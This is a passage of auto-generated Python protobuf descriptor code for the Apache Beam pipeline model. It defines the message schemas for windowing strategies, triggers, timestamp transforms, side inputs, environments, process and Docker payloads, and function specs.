_WINDOWINGSTRATEGY = _descriptor.Descriptor(
name='WindowingStrategy',
full_name='org.apache.beam.model.pipeline.v1.WindowingStrategy',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='window_fn', full_name='org.apache.beam.model.pipeline.v1.WindowingStrategy.window_fn', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='merge_status', full_name='org.apache.beam.model.pipeline.v1.WindowingStrategy.merge_status', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='window_coder_id', full_name='org.apache.beam.model.pipeline.v1.WindowingStrategy.window_coder_id', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='trigger', full_name='org.apache.beam.model.pipeline.v1.WindowingStrategy.trigger', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='accumulation_mode', full_name='org.apache.beam.model.pipeline.v1.WindowingStrategy.accumulation_mode', index=4,
number=5, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='output_time', full_name='org.apache.beam.model.pipeline.v1.WindowingStrategy.output_time', index=5,
number=6, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='closing_behavior', full_name='org.apache.beam.model.pipeline.v1.WindowingStrategy.closing_behavior', index=6,
number=7, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='allowed_lateness', full_name='org.apache.beam.model.pipeline.v1.WindowingStrategy.allowed_lateness', index=7,
number=8, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='OnTimeBehavior', full_name='org.apache.beam.model.pipeline.v1.WindowingStrategy.OnTimeBehavior', index=8,
number=9, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='assigns_to_one_window', full_name='org.apache.beam.model.pipeline.v1.WindowingStrategy.assigns_to_one_window', index=9,
number=10, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=7860,
serialized_end=8489,
)
_MERGESTATUS = _descriptor.Descriptor(
name='MergeStatus',
full_name='org.apache.beam.model.pipeline.v1.MergeStatus',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_MERGESTATUS_ENUM,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=8491,
serialized_end=8583,
)
_ACCUMULATIONMODE = _descriptor.Descriptor(
name='AccumulationMode',
full_name='org.apache.beam.model.pipeline.v1.AccumulationMode',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_ACCUMULATIONMODE_ENUM,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=8585,
serialized_end=8662,
)
_CLOSINGBEHAVIOR = _descriptor.Descriptor(
name='ClosingBehavior',
full_name='org.apache.beam.model.pipeline.v1.ClosingBehavior',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_CLOSINGBEHAVIOR_ENUM,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=8664,
serialized_end=8745,
)
_ONTIMEBEHAVIOR = _descriptor.Descriptor(
name='OnTimeBehavior',
full_name='org.apache.beam.model.pipeline.v1.OnTimeBehavior',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_ONTIMEBEHAVIOR_ENUM,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=8747,
serialized_end=8827,
)
_OUTPUTTIME = _descriptor.Descriptor(
name='OutputTime',
full_name='org.apache.beam.model.pipeline.v1.OutputTime',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_OUTPUTTIME_ENUM,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=8829,
serialized_end=8927,
)
_TIMEDOMAIN = _descriptor.Descriptor(
name='TimeDomain',
full_name='org.apache.beam.model.pipeline.v1.TimeDomain',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_TIMEDOMAIN_ENUM,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=8929,
serialized_end=9037,
)
_TRIGGER_AFTERALL = _descriptor.Descriptor(
name='AfterAll',
full_name='org.apache.beam.model.pipeline.v1.Trigger.AfterAll',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='subtriggers', full_name='org.apache.beam.model.pipeline.v1.Trigger.AfterAll.subtriggers', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=10020,
serialized_end=10095,
)
_TRIGGER_AFTERANY = _descriptor.Descriptor(
name='AfterAny',
full_name='org.apache.beam.model.pipeline.v1.Trigger.AfterAny',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='subtriggers', full_name='org.apache.beam.model.pipeline.v1.Trigger.AfterAny.subtriggers', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=10097,
serialized_end=10172,
)
_TRIGGER_AFTEREACH = _descriptor.Descriptor(
name='AfterEach',
full_name='org.apache.beam.model.pipeline.v1.Trigger.AfterEach',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='subtriggers', full_name='org.apache.beam.model.pipeline.v1.Trigger.AfterEach.subtriggers', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=10174,
serialized_end=10250,
)
_TRIGGER_AFTERENDOFWINDOW = _descriptor.Descriptor(
name='AfterEndOfWindow',
full_name='org.apache.beam.model.pipeline.v1.Trigger.AfterEndOfWindow',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='early_firings', full_name='org.apache.beam.model.pipeline.v1.Trigger.AfterEndOfWindow.early_firings', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='late_firings', full_name='org.apache.beam.model.pipeline.v1.Trigger.AfterEndOfWindow.late_firings', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=10253,
serialized_end=10404,
)
_TRIGGER_AFTERPROCESSINGTIME = _descriptor.Descriptor(
name='AfterProcessingTime',
full_name='org.apache.beam.model.pipeline.v1.Trigger.AfterProcessingTime',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='timestamp_transforms', full_name='org.apache.beam.model.pipeline.v1.Trigger.AfterProcessingTime.timestamp_transforms', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=10406,
serialized_end=10512,
)
_TRIGGER_AFTERSYNCHRONIZEDPROCESSINGTIME = _descriptor.Descriptor(
name='AfterSynchronizedProcessingTime',
full_name='org.apache.beam.model.pipeline.v1.Trigger.AfterSynchronizedProcessingTime',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=10514,
serialized_end=10547,
)
_TRIGGER_DEFAULT = _descriptor.Descriptor(
name='Default',
full_name='org.apache.beam.model.pipeline.v1.Trigger.Default',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=10549,
serialized_end=10558,
)
_TRIGGER_ELEMENTCOUNT = _descriptor.Descriptor(
name='ElementCount',
full_name='org.apache.beam.model.pipeline.v1.Trigger.ElementCount',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='element_count', full_name='org.apache.beam.model.pipeline.v1.Trigger.ElementCount.element_count', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=10560,
serialized_end=10597,
)
_TRIGGER_NEVER = _descriptor.Descriptor(
name='Never',
full_name='org.apache.beam.model.pipeline.v1.Trigger.Never',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=10599,
serialized_end=10606,
)
_TRIGGER_ALWAYS = _descriptor.Descriptor(
name='Always',
full_name='org.apache.beam.model.pipeline.v1.Trigger.Always',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=10608,
serialized_end=10616,
)
_TRIGGER_ORFINALLY = _descriptor.Descriptor(
name='OrFinally',
full_name='org.apache.beam.model.pipeline.v1.Trigger.OrFinally',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='main', full_name='org.apache.beam.model.pipeline.v1.Trigger.OrFinally.main', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='finally', full_name='org.apache.beam.model.pipeline.v1.Trigger.OrFinally.finally', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=10619,
serialized_end=10749,
)
_TRIGGER_REPEAT = _descriptor.Descriptor(
name='Repeat',
full_name='org.apache.beam.model.pipeline.v1.Trigger.Repeat',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='subtrigger', full_name='org.apache.beam.model.pipeline.v1.Trigger.Repeat.subtrigger', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=10751,
serialized_end=10823,
)
_TRIGGER = _descriptor.Descriptor(
name='Trigger',
full_name='org.apache.beam.model.pipeline.v1.Trigger',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='after_all', full_name='org.apache.beam.model.pipeline.v1.Trigger.after_all', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='after_any', full_name='org.apache.beam.model.pipeline.v1.Trigger.after_any', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='after_each', full_name='org.apache.beam.model.pipeline.v1.Trigger.after_each', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='after_end_of_window', full_name='org.apache.beam.model.pipeline.v1.Trigger.after_end_of_window', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='after_processing_time', full_name='org.apache.beam.model.pipeline.v1.Trigger.after_processing_time', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='after_synchronized_processing_time', full_name='org.apache.beam.model.pipeline.v1.Trigger.after_synchronized_processing_time', index=5,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='always', full_name='org.apache.beam.model.pipeline.v1.Trigger.always', index=6,
number=12, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='default', full_name='org.apache.beam.model.pipeline.v1.Trigger.default', index=7,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='element_count', full_name='org.apache.beam.model.pipeline.v1.Trigger.element_count', index=8,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='never', full_name='org.apache.beam.model.pipeline.v1.Trigger.never', index=9,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='or_finally', full_name='org.apache.beam.model.pipeline.v1.Trigger.or_finally', index=10,
number=10, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='repeat', full_name='org.apache.beam.model.pipeline.v1.Trigger.repeat', index=11,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_TRIGGER_AFTERALL, _TRIGGER_AFTERANY, _TRIGGER_AFTEREACH, _TRIGGER_AFTERENDOFWINDOW, _TRIGGER_AFTERPROCESSINGTIME, _TRIGGER_AFTERSYNCHRONIZEDPROCESSINGTIME, _TRIGGER_DEFAULT, _TRIGGER_ELEMENTCOUNT, _TRIGGER_NEVER, _TRIGGER_ALWAYS, _TRIGGER_ORFINALLY, _TRIGGER_REPEAT, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='trigger', full_name='org.apache.beam.model.pipeline.v1.Trigger.trigger',
index=0, containing_type=None, fields=[]),
],
serialized_start=9040,
serialized_end=10834,
)
_TIMESTAMPTRANSFORM_DELAY = _descriptor.Descriptor(
name='Delay',
full_name='org.apache.beam.model.pipeline.v1.TimestampTransform.Delay',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='delay_millis', full_name='org.apache.beam.model.pipeline.v1.TimestampTransform.Delay.delay_millis', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=11020,
serialized_end=11049,
)
_TIMESTAMPTRANSFORM_ALIGNTO = _descriptor.Descriptor(
name='AlignTo',
full_name='org.apache.beam.model.pipeline.v1.TimestampTransform.AlignTo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='period', full_name='org.apache.beam.model.pipeline.v1.TimestampTransform.AlignTo.period', index=0,
number=3, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='offset', full_name='org.apache.beam.model.pipeline.v1.TimestampTransform.AlignTo.offset', index=1,
number=4, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=11051,
serialized_end=11092,
)
_TIMESTAMPTRANSFORM = _descriptor.Descriptor(
name='TimestampTransform',
full_name='org.apache.beam.model.pipeline.v1.TimestampTransform',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='delay', full_name='org.apache.beam.model.pipeline.v1.TimestampTransform.delay', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='align_to', full_name='org.apache.beam.model.pipeline.v1.TimestampTransform.align_to', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_TIMESTAMPTRANSFORM_DELAY, _TIMESTAMPTRANSFORM_ALIGNTO, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='timestamp_transform', full_name='org.apache.beam.model.pipeline.v1.TimestampTransform.timestamp_transform',
index=0, containing_type=None, fields=[]),
],
serialized_start=10837,
serialized_end=11115,
)
_SIDEINPUT = _descriptor.Descriptor(
name='SideInput',
full_name='org.apache.beam.model.pipeline.v1.SideInput',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='access_pattern', full_name='org.apache.beam.model.pipeline.v1.SideInput.access_pattern', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='view_fn', full_name='org.apache.beam.model.pipeline.v1.SideInput.view_fn', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='window_mapping_fn', full_name='org.apache.beam.model.pipeline.v1.SideInput.window_mapping_fn', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=11118,
serialized_end=11350,
)
_ENVIRONMENT = _descriptor.Descriptor(
name='Environment',
full_name='org.apache.beam.model.pipeline.v1.Environment',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='url', full_name='org.apache.beam.model.pipeline.v1.Environment.url', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='urn', full_name='org.apache.beam.model.pipeline.v1.Environment.urn', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='payload', full_name='org.apache.beam.model.pipeline.v1.Environment.payload', index=2,
number=3, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=11352,
serialized_end=11408,
)
_STANDARDENVIRONMENTS = _descriptor.Descriptor(
name='StandardEnvironments',
full_name='org.apache.beam.model.pipeline.v1.StandardEnvironments',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_STANDARDENVIRONMENTS_ENVIRONMENTS,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=11411,
serialized_end=11570,
)
_DOCKERPAYLOAD = _descriptor.Descriptor(
name='DockerPayload',
full_name='org.apache.beam.model.pipeline.v1.DockerPayload',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='container_image', full_name='org.apache.beam.model.pipeline.v1.DockerPayload.container_image', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=11572,
serialized_end=11612,
)
_PROCESSPAYLOAD_ENVENTRY = _descriptor.Descriptor(
name='EnvEntry',
full_name='org.apache.beam.model.pipeline.v1.ProcessPayload.EnvEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='org.apache.beam.model.pipeline.v1.ProcessPayload.EnvEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='value', full_name='org.apache.beam.model.pipeline.v1.ProcessPayload.EnvEntry.value', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001')),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=11749,
serialized_end=11791,
)
_PROCESSPAYLOAD = _descriptor.Descriptor(
name='ProcessPayload',
full_name='org.apache.beam.model.pipeline.v1.ProcessPayload',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='os', full_name='org.apache.beam.model.pipeline.v1.ProcessPayload.os', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='arch', full_name='org.apache.beam.model.pipeline.v1.ProcessPayload.arch', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='command', full_name='org.apache.beam.model.pipeline.v1.ProcessPayload.command', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='env', full_name='org.apache.beam.model.pipeline.v1.ProcessPayload.env', index=3,
number=4, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_PROCESSPAYLOAD_ENVENTRY, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=11615,
serialized_end=11791,
)
_SDKFUNCTIONSPEC = _descriptor.Descriptor(
name='SdkFunctionSpec',
full_name='org.apache.beam.model.pipeline.v1.SdkFunctionSpec',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='spec', full_name='org.apache.beam.model.pipeline.v1.SdkFunctionSpec.spec', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='environment_id', full_name='org.apache.beam.model.pipeline.v1.SdkFunctionSpec.environment_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=11793,
serialized_end=11897,
)
_FUNCTIONSPEC = _descriptor.Descriptor(
name='FunctionSpec',
full_name='org.apache.beam.model.pipeline.v1.FunctionSpec',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='urn', full_name='org.apache.beam.model.pipeline.v1.FunctionSpec.urn', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='payload', full_name='org.apache.beam.model.pipeline.v1.FunctionSpec.payload', index=1,
number=3, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=11899,
serialized_end=11943,
)
_DISPLAYDATA_IDENTIFIER = _descriptor.Descriptor(
name='Identifier',
full_name='org.apache.beam.model.pipeline.v1.DisplayData.Identifier',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='transform_id', full_name='org.apache.beam.model.pipeline.v1.DisplayData.Identifier.transform_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='transform_urn', full_name='org.apache.beam.model.pipeline.v1.DisplayData.Identifier.transform_urn', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='key', full_name='org.apache.beam.model.pipeline.v1.DisplayData.Identifier.key', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
